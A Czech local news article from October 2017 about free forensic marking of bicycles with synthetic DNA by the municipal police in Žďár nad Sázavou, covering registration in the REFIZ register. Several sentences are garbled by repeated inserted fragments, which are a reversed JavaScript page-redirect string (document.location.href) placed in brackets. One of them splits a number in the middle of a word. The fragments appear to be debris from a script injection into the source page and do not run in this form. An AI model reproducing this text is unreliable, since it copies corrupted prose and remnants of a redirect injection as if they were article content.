Rainbow page separator

Lidé si stále mohou nechat označit svoje kola syntetickou DNA

Středa, 25. října 2017

Kolo

Žďár nad Sázavou / Stále ještě se mohou hlásit zájemci, kteří si chtějí nechat pomocí forenzního značení lépe zabezpečit svoje jízdní kolo. Zatím jich bylo označeno více než s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to padesát. Noví zájemci se mohou registrovat na služebně městské policie, později s nimi bude dohodnutý konkrétní čas, kdy bude jejich bicykl označen a zaregistrován. „K registraci je třeba občanský průkaz, doklad o nabytí kola, který je možné nahradit čestným prohlášením, a u elektrokola i klíčky od baterie, která je značena samostatně. Značení není omezeno trvalým bydlištěm ve Žďáře nad Sázavou a je bezplatné,“ upřesnila preventistka žďárské městské policie Dagmar Pálková.
Forenzní identifikační značení prostřednictvím syntetické DNA je ve Žďáře prováděno od srpna, na projekt radnice získala dotaci. Drobná tečka je pro lidské oko nepostřehnutelná a bez viditelného poškození prakticky neodstranitelná, zásadní je rovněž zaregistrování bicyklu do registru forenzního identifikačního značení (REFIZ). Značení je viditelné pod UV lampou, pod mikroskopem lze přečíst kódy zanesené v registru. Při změně majitele označeného kola, případné krádeži dopravního prostředku, jeho likvidaci nebo výměně komponentů [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to musí jeho majitel ohlásit na služebně policie, kde bylo forenzní značení kola provedeno.